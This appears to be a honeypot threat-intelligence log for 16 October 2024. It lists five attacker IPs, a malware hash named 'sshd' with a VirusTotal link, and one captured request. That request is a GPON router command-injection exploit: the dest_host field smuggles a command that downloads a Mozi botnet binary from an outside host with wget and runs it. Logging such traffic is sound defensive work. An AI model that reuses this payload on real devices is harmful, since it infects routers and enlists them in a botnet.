Top 5 IPs for 16-10-2024 :

205.209.156.5
208.77.45.5
176.114.224.76
4.4.66.84
183.101.57.151

Malware Observed:

File name : sshd
94f2e4d8d4436874785cd14e6e6d403507b8750852f7f2040352069a75da4c00
https://www.virustotal.com/gui/file/94f2e4d8d4436874785cd14e6e6d403507b8750852f7f2040352069a75da4c00
 

Commands/exploits observed :

POST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://117.215.243.169:58460/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0

